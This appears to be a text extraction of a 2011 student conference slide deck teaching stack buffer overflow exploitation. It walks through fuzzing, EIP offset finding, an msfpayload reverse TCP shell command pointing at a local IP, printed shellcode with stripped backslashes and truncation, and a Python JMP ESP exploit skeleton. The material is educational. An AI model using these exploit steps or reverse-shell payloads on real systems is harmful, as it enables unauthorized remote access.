twentyCAT event 14/5/2011

1. Smash The Stack!
By: @MennaEssa
FCIS Student , 2nd year.

2. Agenda
 Theory
 Steps : 1­Find a bug 2­verify the bug 3­Finalize and use
the shell code
 View from above
 Exploit development ?

3. What is ?
 Buffer ?
 Buffer over flow ?
 Smash the stack ?
 So the theory is ==>

4. The Theory:
#include <string.h>
void do_something(char *Buffer)
{
char MyVar[128];
strcpy(MyVar,Buffer);
}
int main (int argc, char **argv)
{
do_something(argv[1]);
}

5. Step1 : Find the bug
 Got the source code? Awesome!
 No?
 Reversing (Fuzzing)
 Simply , you can keep giving the
program inputs of an increasing
sizes until it crashes.

6. Step2 : Verify the bug
 Where is the EIP ?
 Use a debugger to guide your self
 Used different inputs to limit the range
of your expectations.
 Use unique patterns to find exactly
where the file is
 “./pattern_create.rb <size>“
 /pattern_offset.rb <Data written in EIP>
<Size>
 You've got the EIP... Sweet!

7. Now what?
 No that you have the EIP you should
be able to overwrite it with an
address where you have your evil <no?
> code.
 We call this the shell code.
 a shellcode is a small piece of code
used as the payload in the
exploitation of a software
vulnerability
 Ok...WHERE!

8. Where?
 Remeber when you overwrote your
EIP ? Why not use the rest of the
buffer to put it there? right
where the ESP is pointing
 EIP ==> ESP “DMA nope!”
 Use a jump op. From one of the
dlls ..
 Google some resources for that ;)

9. Get the shell code
 Now you control the EIP , now
where to put your shell code
 ./msfpayload
windows/shell/reverse_tcp
LHOST=192.168.1.112 C

10. Greet the shell code :)
unsigned char buf[] =
"xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"x31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2"
"xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85"
"xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3"
"x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0d"
….....
x0fxdfxe0xffxd5x97x6a"
"x05x68xc0xa8x01x70x68x02x00x11x5cx89xe6x6ax10"
"x56x57x68x99xa5x74x61xffxd5x85xc0x74x0cxffx4e"
"x08x75xecx68xf0xb5xa2x56xffxd5x6ax00x6ax04x56"
"x57x68x02xd9xc8x5fxffxd5x8bx36x6ax40x68x00x10"
"x00x00x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6a"
"x00x56x53x57x68x02xd9xc8x5fxffxd5x01xc3x29xc6"
"x85xf6x75xecxc3";

11. Finalize:

12. Finalize:
#!/usr/bin/env python
buff = ‘A’ *26072
buff += ‘x3axf2xa8x01′ # EIP overwrite #JMP ESP address.
buff += ‘CCCC’ # 4 bytes of garbage
buff += "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"x31xc0xacx3c.....” #your shellcode
f= open(some_file, ‘w’) #whatever how this will be an
input to a program
f.write(buff)
f.close()

13. Now Add it to your code
and you're done
 Winamp remote buffer overflow exploit
live demo.
[this flaw is triggered when a audio file path is
specified, inside a playlist, that consists of a UNC
path with a long computer name. This module delivers the
playlist via the browser]

14. The look from above...
 Exploit development , security
researchers the need to exist
more here :)
 Remember to know how
 You can find some neat tutorials
on isecurity , corelanec0d3r

15. ~# Thanks_